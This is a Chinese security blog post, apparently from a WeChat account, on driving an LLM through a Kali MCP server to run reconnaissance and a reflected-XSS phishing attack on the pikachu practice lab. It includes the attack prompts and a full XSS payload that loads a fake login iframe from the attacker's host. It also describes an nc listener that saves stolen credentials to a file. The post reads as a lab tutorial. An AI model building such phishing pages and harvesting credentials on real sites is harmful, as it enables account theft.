让Kali装上MCP除了能自动化渗透,还能干点啥呢?
钓个鱼呗,反正大模型自己写代码溜得飞起。
环境配置这里简单说一下,不是很明白的可以进星球哈
,里面有视频讲解呢!!!
工具包获取:关注,后台私信:kalimcp
1、在kali里跑起server服务
直接在kali中执行kali_server.py即可:
2、物理机安装MCP
cmd直接直接执行mcp_server.py主打就是简单
python mcp_server.py --server http://192.168.3.24:5000
3、配置Trea的MCP
这个我就不给工具包了,自己百度搜Trea,去官网下就可以了,记得下国际版,里面有外面的大模型,好用些。
-
1、mcp的路径改为自己的:D:kali_mcpmcp_server.py -
2、kali的地址:http://192.168.3.24:5000
{
"mcpServers": {
"kali_mcp": {
"command": "cmd",
"args": [
"/c",
"python",
"D:\kali_mcp\mcp_server.py",
"--server",
"http://192.168.3.24:5000"
]
}
}
}
看到下面有kali_mcp就说明我们的配置就ok了
剩下的就是干干干了!!!!
这次我们选择的模型是:Gemini-2.5-pro-Preview
按照我日常渗透的思路走。
环境:kali2024、LLM:Gemini-2.5-pro-Preview、靶场pikachu
信息收集
我们第一步先让他进行信息收集、记住这一步非常关键。
因为它能够将banner信息收集出来。
banner信息知道了,大模型已经学习过很多漏洞,其实已知漏洞,他自己就能测出来了,跟不不用我们下达过多命令
信息收集的提示词(提示词很关键,不会写的可以收藏,我星球会更新top10所以的提示词
,需要的可以进。)
对给你的链接进行信息收集:
1、开放的端口和服务
2、操作系统、Web服务器及版本
3、中间件:编程语言、框架、数据库
4、前端使用的技术
5、泄露的敏感信息
http://192.168.3.222/pikachu/
下面是他收集出来的效果:
收集的内容还是很全的。非常好后面可以直接使用。
反射型XSS进行钓鱼
发射型xss钓鱼的原理就不多说了把。
1、先验证这是反射型xss
2、构造url
3、诱骗别人点击填写账号密码
4、黑客后台收到被骗的账号密码
每个漏洞的原理要懂,这样你才能拆解出来,你才能写出来好的提示词。
AI才能帮你完成你像完成的任务。
这一步的提示词:
这个链接是一个反射型xss漏洞。
1、通过上文了解这个网站的基本信息
2、先对其进行请求,确认请求的各个参数
3、利用你的编码能力利用这个反射型xss构造一个登录的钓鱼网站
http://192.168.3.222/pikachu/vul/xss/xss_reflected_get.php
从大模型显示的执行过程可以看出来,完全是按照我们的要求做的。
-
验证XSS漏洞,确认提交的参数 -
在kali中创建钓鱼页面 -
kali上开通nc监听传回来的账号密码。
在服务器上创建了钓鱼页面的日志记录:
我们通过物理机的浏览器访问:
http://192.168.3.222/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.write%28%27%3Ciframe%20src%3D%22http%3A%2F%2F192.168.3.1%3A8000%2Fphishing_page.html%22%20style%3D%22position%3Afixed%3B%20top%3A0%3B%20left%3A0%3B%20width%3A100%25%3B%20height%3A100%25%3B%20border%3Anone%3B%20z-index%3A9999%3B%22%3E%3C%2Fiframe%3E%27%29%3C%2Fscript%3E&submit=submit
第一次访问可以看到页面很丑,并且提交按钮还不能提交。
直接下达命令,让他自己进行完善页面:
用了1分钟,再次刷新页面已经很漂亮了
这里真心不得不惊叹大模型的编码能力,想要啥口述即可
直接输入admin/admin进行测试看看kali能不能收到。
登录kali后台,在tmp目录下有个creds.txt文件。
里面记录了我们刚才提交的几个账号密码。
不得不说,AI真的正在改变安全,特别是在编码能力上。
只要你能够把漏洞利用过程描述清楚,大模型就能帮你完成这些渗透,未来这些提示词肯定会成为标准化,可能成为脚本,也可能成为厂商漏扫盒子里面的规则。
在昨晚的测试中我还发现一个非常恐怖的事情:
我在测试爆破的时候,由于返回token的限制,一直没有成功,他尽然知道pikachu的默认账号密码admin/123456
然后利用他的记忆成功的登录成功了。
想一下大模型是怎么出来的,是预训练的,也就是学习了非常非常多的知识,关键它不忘,你只要把banner信息
告诉他,或者他能自己探测
出来,他是不是就能从自己记忆中把已知漏洞给利用了???
是不是有点细思极恐了,昨晚信息收集,大模型就能把已知漏洞利用出来。
这个过程感兴趣的小伙伴可以到星球看哈。
星球介绍
一个人走的很快,但一群人才能地的更远。吉祥同学学安全这个星球🔗成立了1年左右,已经有500+的小伙伴了,如果你是网络安全的学生、想转行网络安全行业、需要网安相关的方案、ppt,戳链接🔗(内有优惠卷)快加入我们吧。系统性的知识库已经有:《Java代码审计》++《Web安全》++《应急响应》++《护网资料库》++《网安面试指南》+《AI+网安》
原文始发于微信公众号(吉祥讲安全):AI自动化钓鱼来袭!你的密码还安全吗?
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论